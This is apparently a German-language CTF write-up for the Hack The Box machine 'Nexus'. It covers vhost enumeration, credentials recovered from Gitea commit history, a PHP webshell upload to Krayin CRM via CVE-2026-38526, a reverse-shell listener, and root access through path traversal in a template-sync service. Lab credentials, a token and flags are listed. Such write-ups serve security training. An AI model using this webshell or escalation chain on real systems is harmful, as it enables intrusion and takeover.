
# Hack The Box Nexus-Maschinen-Write-up mit Aufklärung, Gitea-Credential-Erkennung, Krayin-CRM-Ausnutzung über CVE-2026-38526, initialem Zugriff und Privilege-Eskalation über einen verwundbaren Gitea-Template-Synchronisierungsdienst.
English 🇺🇸 | Español 🇪🇸
Nexus ist eine Linux-Maschine mit einfachem Schwierigkeitsgrad von Hack The Box, die eine mehrstufige Angriffskette demonstriert, die virtuelle Host-Enumeration, offengelegte Zugangsdaten, verwundbare Webanwendungsfunktionen, Remote-Code-Ausführung, Wiederverwendung von Zugangsdaten und lokale Privilegienerweiterung umfasst.
Reconnaissance
│
▼
Virtual Host Enumeration
│
├── git.nexus.htb
└── billing.nexus.htb
│
▼
Gitea Commit History
│
▼
Exposed Credentials
│
▼
Krayin CRM Login
│
▼
CVE-2026-38526
│
▼
PHP Webshell
│
▼
Reverse Shell
(www-data)
│
▼
Application .env
│
▼
SSH as jones
│
▼
gitea-template-sync
│
▼
Path Traversal
│
▼
Malicious Git Repository
│
▼
SSH as root
rootZiel-IP: 10.129.82.92
nmap -p- -sV -sC -oN nexus_full_scan.txt 10.129.82.92
22/tcp open ssh OpenSSH 9.6p1 Ubuntu
80/tcp open http nginx 1.24.0 (Ubuntu)
gobuster vhost \
-u http://nexus.htb \
-w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
--append-domain
git.nexus.htb → Gitea
billing.nexus.htb → Krayin CRM
Fügen Sie die entdeckten Hosts zu /etc/hosts hinzu:
echo "10.129.82.92 nexus.htb git.nexus.htb billing.nexus.htb" | sudo tee -a /etc/hosts
Navigieren Sie zu:
http://git.nexus.htb
Ein Repository namens:
admin/krayin-docker-setup
enthält nützliche Informationen in seiner Git-Historie.
Die .env-Datei kann aus früheren Commits wiederhergestellt werden und legt Zugangsdaten offen, die in der aktuellen Version nicht mehr vorhanden sind.
| Dienst | Benutzername | Passwort |
|---|---|---|
| Krayin CRM | [email protected] | N27xh!!2ucY04 |
| Gitea | jones | N27xh!!2ucY04 |
Die E-Mail-Adresse [email protected] wurde auch im Bereich „Beschäftigung“ der Hauptwebsite identifiziert.
URL: http://billing.nexus.htb/admin/login
E-Mail: [email protected]
Passwort: N27xh!!2ucY04
Navigieren Sie zu:
/admin/mail/sent
Dann:
Das Payload wird gespeichert unter:
exploits/CVE-2026-38526/shell.php
Payload:
<?php system($_GET["cmd"]); ?>
Die relevanten Multipart-Felder sind:
Content-Disposition: form-data; name="attachments[]"; filename="shell.php"
Content-Type: application/x-php
Nach erfolgreichem Upload:
http://billing.nexus.htb/storage/emails/2/shell.php?cmd=id
Erwartetes Ergebnis:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Starten Sie einen Listener:
nc -lvnp 4444
Lösen Sie dann die Reverse Shell über die hochgeladene Webshell aus.
Die Python-Implementierung ist verfügbar unter:
exploits/CVE-2026-38526/reverse_shell.py
In dieser Phase wird die Shell erhalten als:
www-data
Untersuchen Sie die Krayin-Konfiguration:
cat /var/www/krayin/.env
Zugangsdaten werden gefunden:
DB_USERNAME=krayin
DB_PASSWORD=y27xb3ha!!74GbR
cat /etc/passwd | grep sh$
Das Konto jones wird identifiziert.
Passwort:
y27xb3ha!!74GbR
f20cbf9aeb6bb228d356a42ff49c1933
systemctl list-units | grep -i gitea
Der folgende Dienst und Timer werden identifiziert:
gitea-template-sync.timer
gitea-template-sync.service
Der Dienst wird mit erhöhten Rechten ausgeführt.
/etc/gitea/template-sync.py
Der Synchronisierungsmechanismus verwendet eine Pfadkonstruktion, die durch Path Traversal missbraucht werden kann.
Generieren Sie ein SSH-Schlüsselpaar:
ssh-keygen -t ed25519 -f /tmp/nexus_root -N ""
cat /tmp/nexus_root.pub
Der Exploit zur Manipulation von Git-Objekten befindet sich unter:
exploits/gitea_template_sync/exploit_git.py
Erstellen Sie das Repository:
cd /tmp
rm -rf exploit
mkdir exploit
cd exploit
git init
python3 exploit_git.py
Das Repository muss den Zweig:
main
verwenden.
Generieren Sie ein persönliches Zugriffstoken über:
http://git.nexus.htb
Navigieren Sie zu:
Einstellungen → Anwendungen
Konfigurieren Sie dann das Remote:
git remote set-url origin http://jones:[email protected]/jones/exploit.git
Schieben Sie das bösartige Repository:
git push -f origin main
Überwachen Sie das Synchronisierungsprotokoll:
tail -f /var/log/template-sync.log
Eine erfolgreiche Synchronisierung führt dazu, dass der bösartige Git-Baum vom privilegierten Dienst verarbeitet wird.
Beispiel:
[2026-08-27 02:01:30] Syncing template: jones/exploit
[2026-08-27 02:01:30] synced: ../../../../../root/.ssh/authorized_keys
[2026-08-27 02:01:30] Template sync complete
Sobald der öffentliche SSH-Schlüssel in das Root-Konto geschrieben wurde:
ssh -i /tmp/nexus_root [email protected]
Überprüfen Sie den Zugriff:
whoami
Erwartet:
root
Rufen Sie das Root-Flag ab:
cat /root/root.txt
85be1d2a3084e387da0e7dd118908c63
| Flag | Wert |
|---|---|
| User | f20cbf9aeb6bb228d356a42ff49c1933 |
| Root | 85be1d2a3084e387da0e7dd118908c63 |
Diese Zugangsdaten gehören zur Hack-The-Box-Laborumgebung, die von diesem Repository dokumentiert wird.
htb-labs-nexus/
├── README.md
├── exploits/
│ ├── CVE-2026-38526/
│ │ ├── shell.php
│ │ ├── reverse_shell.py
│ │ └── burp_request.txt
│ └── gitea_template_sync/
│ ├── exploit_git.py
│ ├── create_repo.sh
│ └── key.pub
├── scripts/
│ ├── linpeas.sh
│ ├── LinEnum.sh
│ └── enum_services.sh
├── assets/
│ ├── nmap_scan.txt
│ ├── gobuster_vhost.txt
│ └── credentials.txt
├── screenshots/
│ ├── gitea_repo.png
│ ├── crm_login.png
│ ├── webshell.png
│ └── root_flag.png
└── notes/
├── methodology.md
├── commands.md
└── credentials.md
Dieses Repository ist ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bestimmt.
Die hier dokumentierten Techniken, Zugangsdaten, Exploits und Befehle dürfen nicht gegen Systeme ohne ausdrückliche Genehmigung verwendet werden.
root läuft, kann ein Vektor für Privilegienerweiterung werden.⭐ Wenn Ihnen dieses Write-up nützlich war, erwägen Sie, dem Repository einen Stern zu geben.
| Dienst | Benutzername | Passwort / Schlüssel |
|---|
| Krayin CRM | [email protected] | N27xh!!2ucY04 |
| Gitea | jones | N27xh!!2ucY04 |
| Gitea-Token | jones | 1dd7105bf7e57cad02c5a56af5d92703a7839364 |
| SSH | jones | y27xb3ha!!74GbR |
| SSH Root | root | /tmp/nexus_root |
| Werkzeug | Zweck |
|---|
| Nmap | Port- und Dienst-Enumeration |
| Gobuster | Virtuelle Host-Enumeration |
| Burp Suite | Abfangen und Modifizieren von HTTP-Anfragen |
| Git | Repository-Analyse und Erstellung bösartiger Repositorys |
| Python 3 | Exploit-Skripte |
| Netcat | Reverse-Shell-Listener |
| LinEnum | Linux-Enumeration |
| LinPEAS | Enumeration zur Privilegienerweiterung |
| SSH | Fernzugriff |